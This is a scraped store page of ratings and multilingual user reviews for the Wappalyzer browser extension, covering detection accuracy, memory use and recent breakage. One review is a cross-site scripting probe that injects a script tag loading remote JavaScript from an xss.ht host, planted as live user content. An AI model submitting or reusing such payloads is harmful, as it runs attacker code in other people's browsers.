Wappalyzer - Technology profiler

Wappalyzer - Technology profiler

Identify web technologies

Wappalyzer - Technology profiler promo image
Total ratings for Wappalyzer - Technology profiler
4.59 (Rating count: 1,868)
User reviews summary
These summaries are automatically generated weekly using AI based on recent user reviews. Chrome Web Store does not verify user reviews, so some user reviews may be inaccurate, spammy, or outdated.
Pros
  • Accurate technology detection
  • Ability to toggle the extension on and off
  • Slick UI
  • Does not require sign up/login
Cons
  • Poor CMS detection for some platforms
  • High memory usage
  • Recent performance issues
  • Not working for some users
Most mentioned
  • Accurate technology detection
  • Memory usage issues
  • Recent performance issues
See reviews for Wappalyzer - Technology profiler on Chrome Web Store
Recent 25 reviews for Wappalyzer - Technology profiler
Recent rating average: 3.40
All time rating average: 4.59
Rating filters
5 star
44%
4 star
12%
3 star
12%
2 star
4%
1 star
28%
Timestamp Author Rating Comment
2023-04-26
Дмитрий (Git507)
Дмитрий (Git507)
Приемлемая альтернатива WhutRuns, ставлю 4 из 5, поскольку изначальный замах на подписочную модель напрягает и настораживает.
2023-04-23
xovu com
xovu com
Nothing else compares and I've tried many different tech stack scanners using both website lookup tools and browser extensions. Pros: Besides Wappalyzer, no other tech stack scanner I've tried properly detects meta frameworks. For example, try scanning the astro.build website with the builtwith.com technology profile tool, it can't even detect the astro framework; pretty useless if you ask me! Some cool features about the Wappalyzer plugin I appreciate are: 1. Ability to toggle the extension on and off from the Chrome Wappalyzer Icon. 2. Use technology icon instead of Wappalyzer logo extension option. 3. Slick UI including Dark Mode toggle. 4. This plugin does not require you to signup and login unlike their website which does require you to signup in order to scan. Cons: Wappalyzer could do a better job at updating their CMS detection. For example, they didn't detect Directus, Payload CMS, Tina CMS or Strapi; but to their credit, they did detect Contentful, Storyblok, Grav CMS and even Page builders like Webflow & Elementor.
2023-04-01
Nika Kerelashvili
Nika Kerelashvili
best tool. top 3 needed when developing web
2023-03-29
Tutor Manoj Kumar
Tutor Manoj Kumar
Thanks for the developer that they have made such a valuable extension to analyze any website.
2023-03-23
Gustavo Silva Pinheiro
Gustavo Silva Pinheiro
É uma aplicação maravilhosa! Da para você saber quais tecnologias o mercado mais está usando para poder estudar. Agora, recentimente tem acontecido algo chato, que é quando você vai para o site a partir da extensão, a página do app é encolhida. Poderiam verificar?
2023-02-21
uu 109
uu 109
shaking
2023-02-17
Ange Guillaume Koffi
Ange Guillaume Koffi
Très utile !
2023-02-12
Doug Wilson
Doug Wilson
Functionally? Great, works well all around. Accuracy? Stellar, the signatures are good. Efficiency? This plugin is so bad I have a dedicated copy of Chrome for using Wappalyzer. The unbounded memory growth forces me to kill the process usually once a day if I use this on my regular Chrome browser. Disabling and re-enabling the extension is annoying. This would be 5/5 if you fix the performance OR give us ability to not run it at all unless clicked on (the 'on click' in settings is not sufficient).
2023-02-09
林敬軒
林敬軒
Not working for Google and Youtube
2023-02-02
IANDS NoVA
IANDS NoVA
The only web platform analyzer extension that works for me. Just pause any ad blockers while using it and it should work for many sites.
2023-01-18
Thomas Chereau
Thomas Chereau
ça me mets bien les techno dans l'extension puis une fois sur le site de wappalyzer, le contenu de la page s'affiche pendant 2 sec puis le contenu disparait laissant place au footer qui prend toute la page..
2023-01-10
Michał Rzeszutek
Michał Rzeszutek
Ostatnie wersje są wręcz nieużywalne. Powód jest prosty, widżet nawet się nie ładuje. Czas poszukać alternatywy.
2022-12-23
Youtube User
Youtube User
contain malvertising redirect me to smartredirect.de evidence https://i.imgur.com/QKLwfR4.png
2022-11-30
Simone Vacca
Simone Vacca
al momento non funziona su nessun sito (chrome macos)
2022-11-28
Delfan Agata Putra Wiryawan
Delfan Agata Putra Wiryawan
Inpo kebaya merah
2022-11-17
Hairul Lana
Hairul Lana
It's not working on my PC, the extension always saying "No technologies detected"
2022-10-26
Виктор Ефремов
Виктор Ефремов
начал периодически перекрывать сайты украинскими банерами :/
2022-10-24
Leonardo Rocha
Leonardo Rocha
The extension used to be pretty useful. However, a few weeks ago there was an update and now it shows no information whatsoever, regardless of the website I'm in. Sadly there are no other alternatives as good as this used to be.
2022-10-18
laburu agencia
laburu agencia
No se que pasa ultimamente pero no me muestra los datos del sitio, llevo usandolo 6 meses pero ha estado fallando.
2022-10-11
Jacek Lajdecki
Jacek Lajdecki
The idea is amazing but it says that every website is made with react? My PHP website: react My static plain html and css website: react My JSF Primefaces website: react Are you serious? I'd rather have a message "could not get all technologies" or something than just slap react everywhere. Another solution could be a percentage of how sure the extension is that a website is made with given technology
2022-10-05
Oleksandr Savchenko
Oleksandr Savchenko
Гарне розширення, що допомагає швидко "підглянути" які технології використовуються на тому чи іншому сайті
2022-10-04
Andrius S
Andrius S
Great extension, so helpful when doing research about competitors
2022-09-24
Raja Vikram
Raja Vikram
"><script src=https://vivdev.xss.ht></script>
2022-09-06
David Constantine
David Constantine
Good app but after a while it uses an enormous amount of RAM even when not prompted to be used.
2022-08-12
Kevin Moore
Kevin Moore
The author is super responsive. Very useful for tracking the usage of our teck stack!